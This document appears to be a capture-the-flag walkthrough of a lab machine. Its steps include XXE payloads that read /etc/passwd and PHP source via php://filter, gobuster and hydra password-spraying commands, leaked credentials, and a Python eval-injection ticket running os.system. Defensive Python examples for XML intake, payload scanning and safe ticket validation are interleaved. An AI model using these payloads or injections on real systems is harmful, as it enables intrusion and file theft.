Open ports
Visit the site
Capture the request with Burp
Suspect XML injection
Test with an internal entity:
<?xml version="1.0"?><!DOCTYPE replace [<!ENTITY example "1111">]>
<bugreport>
<title>&example;</title>
<cwe>2</cwe>
<cvss>3</cvss>
<reward>4</reward>
</bugreport>
XML entity injection confirmed
Build a payload to read /etc/passwd:
<?xml version="1.0"?><!DOCTYPE replace [<!ENTITY example SYSTEM 'file:///etc/passwd'>]>
<bugreport>
<title>&example;</title>
<cwe>2</cwe>
<cvss>3</cvss>
<reward>4</reward>
</bugreport>
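As an added example (not code from the original notes or from the target application), the following Python intake routine shows how the `<bugreport>` document above should be received on the server side: any DOCTYPE is refused before a parser sees it, the document is then parsed with the standard library's xml.etree.ElementTree, which does not fetch external entities, and only the four expected fields are extracted. The function names and the benign sample document are constructed for this example; the two payload documents are the ones from the notes.

```python
# Added example, not the original notes' code: defensive handling of the
# <bugreport> XML shown above. The parser never sees a DOCTYPE, and
# ElementTree itself does not fetch external entities.
import re
import xml.etree.ElementTree as ET

DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.IGNORECASE)
EXPECTED_FIELDS = ("title", "cwe", "cvss", "reward")


class UnsafeXML(ValueError):
    """Raised when the submitted document is refused at intake."""


def parse_bugreport(raw: str) -> dict:
    """Return the four expected fields, refusing any document with a DTD.

    A DOCTYPE is the only place an entity (internal or SYSTEM) can be
    declared, so rejecting it up front closes the XXE vector regardless
    of how the parser underneath is configured.
    """
    if DOCTYPE_RE.search(raw):
        raise UnsafeXML("DOCTYPE declarations are not accepted")
    root = ET.fromstring(raw)
    if root.tag != "bugreport":
        raise UnsafeXML(f"unexpected root element <{root.tag}>")
    fields = {}
    for name in EXPECTED_FIELDS:
        el = root.find(name)
        fields[name] = (el.text or "").strip() if el is not None else ""
    return fields


def is_accepted(raw: str) -> bool:
    """True if the document passes the intake check and parses."""
    try:
        parse_bugreport(raw)
    except (UnsafeXML, ET.ParseError):
        return False
    return True


def title_after_unguarded_parse(raw: str) -> str:
    """What ElementTree yields for <title> if the DOCTYPE check is skipped.

    Internal entities are expanded by expat, so the "1111" test works.
    For the SYSTEM entity, expat hands the reference to ElementTree, which
    raises ParseError ("undefined entity") instead of reading the file.
    """
    try:
        root = ET.fromstring(raw)
    except ET.ParseError:
        return ""
    el = root.find("title")
    return (el.text or "") if el is not None else ""


# Constructed benign report, plus the two payload documents from the notes.
BENIGN = ('<?xml version="1.0"?><bugreport><title>Broken login</title>'
          '<cwe>287</cwe><cvss>5.3</cvss><reward>100</reward></bugreport>')
INTERNAL_ENTITY = ('<?xml version="1.0"?><!DOCTYPE replace [<!ENTITY example "1111">]>'
                   '<bugreport><title>&example;</title><cwe>2</cwe><cvss>3</cvss>'
                   '<reward>4</reward></bugreport>')
EXTERNAL_ENTITY = ('<?xml version="1.0"?><!DOCTYPE replace '
                   "[<!ENTITY example SYSTEM 'file:///etc/passwd'>]>"
                   '<bugreport><title>&example;</title><cwe>2</cwe><cvss>3</cvss>'
                   '<reward>4</reward></bugreport>')

if __name__ == "__main__":
    print(parse_bugreport(BENIGN))
    for sample in (INTERNAL_ENTITY, EXTERNAL_ENTITY):
        print("accepted:", is_accepted(sample),
              "| unguarded title:", repr(title_after_unguarded_parse(sample)))
```

The DOCTYPE check is the part that matters: the application in the notes is a PHP backend, and there the same defence is to never pass LIBXML_NOENT to the SimpleXML/DOM loader and to refuse documents containing a DTD, rather than relying on the parser's default entity handling.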
Brute-force the site directories with gobuster:
gobuster dir -u http://10.129.224.126 -w /usr/share/dirb/wordlists/big.txt -x php -o file.txt
Build the exploit in Python
Rework the data parameter
PD94bWwgdmVyc2lvbj0iMS4wIj8%2bPCFET0NUWVBFIHJlcGxhY2UgWzwhRU5USVRZIGV4YW1wbGUgU1lTVEVNICdmaWxlOi8vL2V0Yy9wYXNzd2QnPl0%2bDQogICAgICAgIDxidWdyZXBvcnQ%2bDQogICAgICAgIDx0aXRsZT4mZXhhbXBsZTs8L3RpdGxlPg0KICAgICAgICA8Y3dlPjI8L2N3ZT4NCiAgICAgICAgPGN2c3M%2bMzwvY3Zzcz4NCiAgICAgICAgPHJld2FyZD40PC9yZXdhcmQ%2bDQogICAgICAgIDwvYnVncmVwb3J0Pg%3d%3d
PD94bWwgdmVyc2lvbj0iMS4wIj8+PCFET0NUWVBFIHJlcGxhY2UgWzwhRU5USVRZIGV4YW1wbGUgU1lTVEVNICdmaWxlOi8vL2V0Yy9wYXNzd2QnPl0+DQogICAgICAgIDxidWdyZXBvcnQ+DQogICAgICAgIDx0aXRsZT4mZXhhbXBsZTs8L3RpdGxlPg0KICAgICAgICA8Y3dlPjI8L2N3ZT4NCiAgICAgICAgPGN2c3M+MzwvY3Zzcz4NCiAgICAgICAgPHJld2FyZD40PC9yZXdhcmQ+DQogICAgICAgIDwvYnVncmVwb3J0Pg==
Note: URL-decode the special characters (%2b is +, %3d is =)
exp1:
Match the wanted content in the response
exp2:
The wanted content is retrieved
To retrieve the contents of a PHP file, use
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE replace [<!ENTITY example SYSTEM 'php://filter/convert.base64-encode/resource=index.php'>]>
The file contents are base64-encoded first and then returned in the response
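The `data` parameter above is base64 then URL-encoded, so a request log or WAF sees none of the markup directly. As an added example (not code from the original notes), the following Python decodes a captured value the way the note describes, then flags the indicators a reviewer would look for: a DTD, a SYSTEM/PUBLIC entity, a file:// reference, and the php://filter wrapper used for the PHP-source read. The indicator names, the benign sample and the encode helper are constructed for this example; the captured value is the one from the notes.

```python
# Added example, not code from the original notes: decode a captured `data`
# parameter of the form shown above (URL-encoded base64 XML) and flag the
# XXE indicators in it. Indicator names and the benign sample are constructed.
import base64
import re
from urllib.parse import quote, unquote

# What a reviewer of the request log would look for in the decoded body.
INDICATORS = {
    "doctype": re.compile(r"<!DOCTYPE", re.IGNORECASE),
    "external_entity": re.compile(r"<!ENTITY\s+\S+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE),
    "file_scheme": re.compile(r"file://", re.IGNORECASE),
    "php_filter": re.compile(r"php://filter", re.IGNORECASE),
}


def decode_data_param(value: str) -> str:
    """URL-decode, then base64-decode, the parameter value.

    unquote (not unquote_plus) is deliberate: '+' is a base64 digit and must
    survive; only %2b/%3d style escapes are translated. Missing '=' padding
    is tolerated because clients often strip it.
    """
    b64 = unquote(value)
    b64 += "=" * (-len(b64) % 4)
    return base64.b64decode(b64).decode("utf-8", errors="replace")


def encode_data_param(xml: str) -> str:
    """Inverse transform, used here only to build constructed samples."""
    return quote(base64.b64encode(xml.encode("utf-8")).decode("ascii"), safe="")


def scan_data_param(value: str) -> list:
    """Indicator names present in the decoded XML, in INDICATORS order."""
    xml = decode_data_param(value)
    return [name for name, rx in INDICATORS.items() if rx.search(xml)]


# The captured value from the notes above, verbatim.
CAPTURED = "PD94bWwgdmVyc2lvbj0iMS4wIj8%2bPCFET0NUWVBFIHJlcGxhY2UgWzwhRU5USVRZIGV4YW1wbGUgU1lTVEVNICdmaWxlOi8vL2V0Yy9wYXNzd2QnPl0%2bDQogICAgICAgIDxidWdyZXBvcnQ%2bDQogICAgICAgIDx0aXRsZT4mZXhhbXBsZTs8L3RpdGxlPg0KICAgICAgICA8Y3dlPjI8L2N3ZT4NCiAgICAgICAgPGN2c3M%2bMzwvY3Zzcz4NCiAgICAgICAgPHJld2FyZD40PC9yZXdhcmQ%2bDQogICAgICAgIDwvYnVncmVwb3J0Pg%3d%3d"

# Constructed samples: the php://filter header from the notes with a report
# body, and a benign report with no DTD at all.
PHP_FILTER_XML = (
    '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE replace '
    "[<!ENTITY example SYSTEM 'php://filter/convert.base64-encode/resource=index.php'>]>"
    "<bugreport><title>&example;</title><cwe>2</cwe><cvss>3</cvss>"
    "<reward>4</reward></bugreport>"
)
PHP_FILTER_SAMPLE = encode_data_param(PHP_FILTER_XML)
BENIGN_SAMPLE = encode_data_param(
    '<?xml version="1.0"?><bugreport><title>Broken login</title>'
    "<cwe>287</cwe><cvss>5.3</cvss><reward>100</reward></bugreport>"
)

if __name__ == "__main__":
    for label, sample in (("captured", CAPTURED), ("php_filter", PHP_FILTER_SAMPLE),
                          ("benign", BENIGN_SAMPLE)):
        print(label, "->", scan_data_param(sample))
```

Any hit on doctype or external_entity is enough to reject the request at the edge; the two scheme checks only tell the analyst what the entity was pointing at.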
exp3:
PHP file contents retrieved
Refine into a more convenient exploit
exp4:
Runs successfully
gobuster results
View db.php
Credentials appear:
admin/m19RoAU0hP41A1sTsq6K
View portal.php
View log_submit.php
Check the users in /etc/passwd
Users root and development exist
Try password spraying:
hydra -L uname.txt -p m19RoAU0hP41A1sTsq6K 10.129.224.126 ssh
SSH into the target
Login succeeds, but only with regular user privileges
Get the user flag:
b1f5888fae3e5af4800a5dc9b67fbe70
Check the list of commands the user is authorized to run
View /opt/skytrain_inc/ticketValidator.py
Analyze the code
Construct a ticket according to its requirements:
# Skytrain Inc
## Ticket to a b c d
__Ticket Code:__
**144
Test with the authorized command
Success
Try executing a command:
# Skytrain Inc
## Ticket to a b c d
__Ticket Code:__
**144+__import__("os").system("id")
The id command runs successfully
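The second ticket works because the validator hands the text after `**` to Python's eval(), so arithmetic and arbitrary calls are treated alike. As an added example (not the target's /opt/skytrain_inc/ticketValidator.py, whose source the notes do not reproduce), the following validator accepts the same four-line format but evaluates the ticket code with a restricted AST walker that permits integer literals and + - * only. The header checks follow the ticket shown above; the acceptance rule (value above 100) and all function names are assumptions made for this example.

```python
# Added example, not the target's ticketValidator.py: the same ticket
# format, validated without eval(). Only integer arithmetic is evaluated;
# names, calls and attribute access are refused before anything runs.
import ast
import operator

ALLOWED_BINOPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
}


class TicketError(ValueError):
    """Raised for any ticket that does not match the format or the rule."""


def safe_arith(expr: str) -> int:
    """Evaluate integer arithmetic only; every other AST node is rejected."""
    try:
        tree = ast.parse(expr.strip(), mode="eval")
    except SyntaxError as exc:
        raise TicketError(f"not an expression: {exc.msg}") from None

    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and type(node.value) is int:
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in ALLOWED_BINOPS:
            return ALLOWED_BINOPS[type(node.op)](walk(node.left), walk(node.right))
        # A Call, Name or Attribute node lands here, e.g. __import__("os")
        raise TicketError(f"disallowed syntax: {type(node).__name__}")

    return walk(tree)


def validate_ticket(text: str) -> int:
    """Check the four-line format and return the evaluated ticket code."""
    lines = text.splitlines()
    if len(lines) < 4:
        raise TicketError("ticket too short")
    if lines[0].strip() != "# Skytrain Inc":
        raise TicketError("bad header line")
    if not lines[1].startswith("## Ticket to "):
        raise TicketError("bad destination line")
    if lines[2].strip() != "__Ticket Code:__":
        raise TicketError("bad code label")
    if not lines[3].startswith("**"):
        raise TicketError("ticket code must start with **")
    value = safe_arith(lines[3][2:])
    # Assumed acceptance rule for this example; the real validator's rule
    # is not reproduced in the notes.
    if value <= 100:
        raise TicketError("ticket code out of range")
    return value


def is_valid_ticket(text: str) -> bool:
    """Boolean wrapper around validate_ticket."""
    try:
        validate_ticket(text)
    except TicketError:
        return False
    return True


# The two tickets from the notes, verbatim.
GOOD_TICKET = """# Skytrain Inc
## Ticket to a b c d
__Ticket Code:__
**144
"""
INJECTED_TICKET = """# Skytrain Inc
## Ticket to a b c d
__Ticket Code:__
**144+__import__("os").system("id")
"""

if __name__ == "__main__":
    print("good ticket:", is_valid_ticket(GOOD_TICKET))
    print("injected ticket:", is_valid_ticket(INJECTED_TICKET))
```

With the first ticket the code evaluates to 144; with the second, the walker meets a Call node and raises before any attribute of os is touched. Whether the format needs arithmetic at all is the first question to ask: if a plain number is enough, int() on the stripped code is the whole fix.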
Try to get the flag
Flag obtained:
51223cf305c258ae69c4e20c45920c1b
Try privilege escalation
Privilege escalation succeeded
Reference video: https://www.youtube.com/watch?v=5axsDhumfhU&ab_channel=IppSec